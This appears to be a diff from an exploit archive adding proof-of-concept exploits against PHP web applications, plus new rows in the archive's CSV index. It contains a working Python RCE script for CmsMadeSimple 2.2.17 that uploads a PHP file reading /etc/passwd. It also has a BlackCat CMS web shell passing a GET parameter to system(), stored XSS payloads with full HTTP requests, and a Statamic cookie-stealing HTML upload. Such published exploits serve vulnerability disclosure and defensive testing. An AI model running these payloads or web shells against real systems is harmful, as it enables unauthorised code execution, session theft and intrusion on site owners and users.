#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Remote Code Execution(RCE)
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
login_url = 'http://localhost/admin/login.php'
username=input('username = ')
password=input('password = ')
upload_url = 'http://localhost/admin/moduleinterface.php'
file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
#phar file content """"<?php echo system('cat /etc/passwd') ?>"""""
login_data = {
'username': username,
'password': password,
'loginsubmit': 'Submit'
}
session = requests.Session()
response = session.post(login_url, data=login_data)
if response.status_code == 200:
print('Login account')
else:
print('Login promlem.')
exit()
files = {
'm1_files[]': open(file_path, 'rb')
}
data = {
'mact': 'FileManager,m1_,upload,0',
'__c': session.cookies['__c'],
'disable_buffer': '1'
}
response = session.post(upload_url, files=files, data=data)
if response.status_code == 200:
print('file upload')
rce_url=f"http://localhost/uploads/{file_path}"
rce=requests.get(rce_url)
print(rce.text)
else:
print('file not upload')

47
exploits/php/webapps/51601.txt Normal file
View file

@ -0,0 +1,47 @@
#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to Content Manager
3. Add New Content
4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section
payload: <img src=x onerror=alert(document.cookie)>
5. Submit Content
6. Visit Content (http://localhost/index.php?page=test)
Request:
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1

36
exploits/php/webapps/51602.txt Normal file
View file

@ -0,0 +1,36 @@
## Title: Statamic 4.7.0 - File-Inclusion
## Author: nu11secur1ty
## Date: 07.13.2023
## Vendor: https://statamic.com/
## Software: https://demo.statamic.com/
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The statamic-4.7.0 suffers from file inclusion - file upload vulnerability.
The attacker can upload a malicious HTML file and can share the
malicious URL which uses the infected HTML file
to the other attackers in the network, they easily can look at the
token session key and can do very dangerous stuff.
## Staus: HIGH Vulnerability
[+]Exploit:
```js
<html>
<script>
alert(document.cookie);
</script>
</html>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)
## Time spend:
01:10:00

20
exploits/php/webapps/51604.txt Normal file
View file

@ -0,0 +1,20 @@
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1

65
exploits/php/webapps/51605.txt Normal file
View file

@ -0,0 +1,65 @@
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs: RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. upload zip file but this zip file must contains poc.php
poc.php file contents
<?php $a=$_GET['code']; echo system($a);?>
4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd
Poc request
POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"
1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip
PKvalsdalsfapoc.php<?php
$a=$_GET['code'];
echo system($a);
?>
blabalaboalpoc.php
blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"
Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--

17
files_exploits.csv
View file

@ -3622,6 +3622,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50742,exploits/hardware/remote/50742.txt,"H3C SSL VPN - Username Enumeration",2022-02-16,LiquidWorm,remote,hardware,,2022-02-16,2022-02-16,0,,,,,,
32743,exploits/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Vulnerabilities",2014-04-08,"Juan Manuel Garcia",remote,hardware,,2014-04-08,2016-12-18,0,OSVDB-105590;OSVDB-105589;OSVDB-105588;OSVDB-105587;OSVDB-105586;OSVDB-105585;OSVDB-105584;OSVDB-105583,,,,,
43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/c57ef2ae2447f8ee7e39554de5f51758a15a9580/Herospeed-TelnetSwitch.py
51607,exploits/hardware/remote/51607.py,"Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution",2023-07-19,"Thurein Soe",remote,hardware,,2023-07-19,2023-07-19,0,CVE-2022-28171,,,,,
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/tothi/pwn-hisilicon-dvr/blob/42d8325e68fdb075fe27df8a269932f9fa9601a6/pwn_hisilicon_dvr.py
48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,,2020-02-05,2020-02-05,0,,,,,,
47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,,2019-09-23,2019-09-23,0,,,,,,
@ -3998,6 +3999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37626,exploits/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor Access / Remote Code Execution",2015-07-16,"Pierre Kim",webapps,hardware,,2015-07-16,2016-09-15,0,,,,,,https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
31261,exploits/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,webapps,hardware,443,2014-01-29,2014-01-29,0,OSVDB-102657,,,,,
17376,exploits/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware,,2011-06-09,2011-07-24,1,OSVDB-72941,,,,,
51603,exploits/hardware/webapps/51603.py,"ABB FlowX v4.00 - Exposure of Sensitive Information",2023-07-19,"Paul Smith",webapps,hardware,,2023-07-19,2023-07-19,0,CVE-2023-1258,,,,,
46132,exploits/hardware/webapps/46132.txt,"Across DR-810 ROM-0 - Backup File Disclosure",2019-01-14,SajjadBnd,webapps,hardware,80,2019-01-14,2019-01-14,0,,,,,,
44982,exploits/hardware/webapps/44982.txt,"ADB Broadband Gateways / Routers - Authorization Bypass",2018-07-05,"SEC Consult",webapps,hardware,80,2018-07-05,2018-07-05,0,CVE-2018-13109,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
38245,exploits/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,webapps,hardware,,2015-09-20,2015-09-20,0,OSVDB-127902;OSVDB-127901;OSVDB-127900,,,,,http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
@ -4879,6 +4881,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49092,exploits/hardware/webapps/49092.txt,"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",2020-11-23,malwrforensics,webapps,hardware,,2020-11-23,2020-11-23,0,CVE-2020-24363,,,,,
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware,,2014-08-03,2016-09-12,0,OSVDB-109840;OSVDB-109839,,,,,
46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,,2019-05-21,2019-05-21,0,CVE-2019-12195,"Cross-Site Scripting (XSS)",,,,
@ -10359,6 +10362,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info
49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,,
51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,,
51571,exploits/multiple/local/51571.txt,"Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure",2023-07-06,nu11secur1ty,local,multiple,,2023-07-06,2023-07-19,0,CVE-2023-33145,,,,,
48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f
44266,exploits/multiple/local/44266.html,"Mozilla Firefox - Address Bar Spoofing",2017-04-14,649,local,multiple,,2018-03-09,2018-03-09,0,CVE-2017-5415,,,,,https://github.com/649/CVE-2017-5415/tree/209b7ae6882a18ae51b1222a68c040a3bc9a8bc5
10544,exploits/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",local,multiple,,2009-12-17,,1,CVE-2009-1839;OSVDB-55163,,,,,
@ -14436,6 +14440,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1825,exploits/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,webapps,php,,2006-05-24,,1,OSVDB-25828;CVE-2006-2682,,,,,
34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info
@ -14807,6 +14812,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,,2021-02-16,2021-02-16,0,,,,,,
49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php,,2021-04-21,2021-04-21,0,,,,,,
48820,exploits/php/webapps/48820.txt,"BlackCat CMS 1.3.6 - Cross-Site Request Forgery",2020-09-21,Noth,webapps,php,,2020-09-21,2020-09-21,0,CVE-2020-25453,,,,,
51605,exploits/php/webapps/51605.txt,"Blackcat Cms v1.4 - Remote Code Execution (RCE)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
51604,exploits/php/webapps/51604.txt,"Blackcat Cms v1.4 - Stored XSS",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
38311,exploits/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,webapps,php,,2013-02-12,2015-09-24,1,,,,,,https://www.securityfocus.com/bid/57910/info
1683,exploits/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,webapps,php,,2006-04-15,,1,OSVDB-24803;CVE-2006-1917,,,,,
34209,exploits/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' SQL Injection",2010-06-28,S.W.T,webapps,php,,2010-06-28,2014-07-30,1,,,,,,https://www.securityfocus.com/bid/41190/info
@ -15909,6 +15916,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",2021-10-01,"Halit AKAYDIN",webapps,php,,2021-10-01,2021-10-01,0,,,,,http://www.exploit-db.comCMSimple_XH-1.7.4.zip,
43075,exploits/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15984,,,,,
24959,exploits/php/webapps/24959.py,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,webapps,php,,2013-04-15,2013-04-15,0,OSVDB-92326;OSVDB-92325;OSVDB-92324;OSVDB-92323;OSVDB-92322;OSVDB-92321;OSVDB-92320;CVE-2013-3535,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php
51600,exploits/php/webapps/51600.txt,"CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
51599,exploits/php/webapps/51599.txt,"CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
51601,exploits/php/webapps/51601.txt,"CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
2766,exploits/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,webapps,php,,2006-11-11,2016-09-14,1,OSVDB-34029;CVE-2006-7185,,,,http://www.exploit-db.comCMSmelborp.zip,
9311,exploits/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,webapps,php,,2009-07-29,,1,OSVDB-56646;CVE-2009-3507;OSVDB-56645;OSVDB-56644;CVE-2009-3506,,,,,
17592,exploits/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,webapps,php,,2011-08-01,2013-12-08,0,OSVDB-74376,,,,,
@ -21875,6 +21885,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43975,exploits/php/webapps/43975.html,"Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,,2018-02-05,2018-02-05,0,CVE-2018-6604,,,,http://www.exploit-db.compkg_zhyandexmap-j30-6.2.1.0-final.zip,
12283,exploits/php/webapps/12283.txt,"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php,,2010-04-17,2016-12-20,1,OSVDB-64247;CVE-2010-1602,,,,http://www.exploit-db.comcom_zimbComment081b.zip,
12284,exploits/php/webapps/12284.txt,"Joomla! Component ZiMBCore 0.1 - Local File Inclusion",2010-04-18,AntiSecurity,webapps,php,,2010-04-17,2016-12-20,1,OSVDB-64248;CVE-2010-1603,,,,http://www.exploit-db.comzimbcore.zip,
51595,exploits/php/webapps/51595.py,"Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)",2023-07-19,qw3rTyTy,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,,2020-03-30,2020-03-30,0,,,,,,
48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,,2020-03-23,2020-03-23,0,,,,,,
44447,exploits/php/webapps/44447.txt,"Joomla! Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,,2018-04-12,2018-04-16,0,CVE-2018-10063,,,,,
@ -24758,6 +24769,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-19,0,CVE-2023-37629,,,,,
51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-09,1,CVE-2023-2246,,,,,
48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
@ -26837,6 +26849,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31844,exploits/php/webapps/31844.txt,"PHPFix 2.0 - '/fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,webapps,php,,2008-05-26,2014-02-23,1,CVE-2008-2479;OSVDB-45643,,,,,https://www.securityfocus.com/bid/29371/info
8975,exploits/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,webapps,php,,2009-06-16,,1,OSVDB-55195;CVE-2009-2112,,,,,
26474,exploits/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,webapps,php,,2005-11-07,2013-06-29,1,CVE-2005-4423;OSVDB-22799,,,,,https://www.securityfocus.com/bid/15335/info
51594,exploits/php/webapps/51594.py,"phpfm v1.7.9 - Authentication type juggling",2023-07-19,thoughtfault,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
17485,exploits/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,webapps,php,,2011-07-04,2011-07-04,1,,,,,,
3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,webapps,php,,2007-01-29,2016-12-14,1,OSVDB-33070;CVE-2007-0638,,,,http://www.exploit-db.comPHPfootball1.6.zip,
7636,exploits/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,webapps,php,,2008-12-31,2016-12-21,1,OSVDB-51105;CVE-2009-0711;OSVDB-51104;CVE-2009-0710;OSVDB-51103;OSVDB-51102;CVE-2009-0709,,,,http://www.exploit-db.comPHPfootball1.6.zip,
@ -27574,6 +27587,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz,
51201,exploits/php/webapps/51201.txt,"pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
51593,exploits/php/webapps/51593.py,"PimpMyLog v1.7.14 - Improper access control",2023-07-19,thoughtfault,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
31734,exploits/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",webapps,php,80,2014-02-18,2014-03-15,0,OSVDB-103445;OSVDB-103444,,,,http://www.exploit-db.compinacms-master.zip,
4519,exploits/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,webapps,php,,2007-10-10,2016-10-20,1,OSVDB-37879;CVE-2007-5387,,,,http://www.exploit-db.compindorama-0.1.zip,
48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,,2020-04-15,2020-04-15,0,,,,,,
@ -27777,6 +27791,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - (Authenticated) SQL Injection",2014-12-27,"xd4rker dark",webapps,php,,2014-12-27,2014-12-27,0,OSVDB-116480;CVE-2014-9457,,,,,
49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,,2020-11-16,2020-11-16,0,,,,,,
48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,,2020-04-21,2020-04-21,0,,,,,,
51197,exploits/php/webapps/51197.txt,"PMB 7.4.6 - SQL Injection",2023-04-01,"str0xo DZ",webapps,php,,2023-04-01,2023-07-19,0,,,,,,
3443,exploits/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,webapps,php,,2007-03-08,,1,OSVDB-35125;CVE-2007-1415;OSVDB-35124;OSVDB-35123;OSVDB-35122;OSVDB-35121;OSVDB-35120;OSVDB-35119;OSVDB-35118;OSVDB-35117;OSVDB-35116;OSVDB-35115;OSVDB-35114;OSVDB-35113;OSVDB-35112;OSVDB-35111;OSVDB-35110;OSVDB-35109;OSVDB-35108;OSVDB-35107;OSVDB-35106;OSVDB-35105;OSVDB-35104;OSVDB-35103;OSVDB-35102;OSVDB-35101,,,,,http://advisories.echo.or.id/adv/adv68-K-159-2007.txt
16087,exploits/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,webapps,php,,2011-02-01,2011-02-01,1,OSVDB-70752,,,,,
3852,exploits/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,webapps,php,,2007-05-03,,1,OSVDB-35781;CVE-2007-2540;OSVDB-35780;OSVDB-35779;OSVDB-35778;OSVDB-35777,,,,,
@ -30090,6 +30105,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
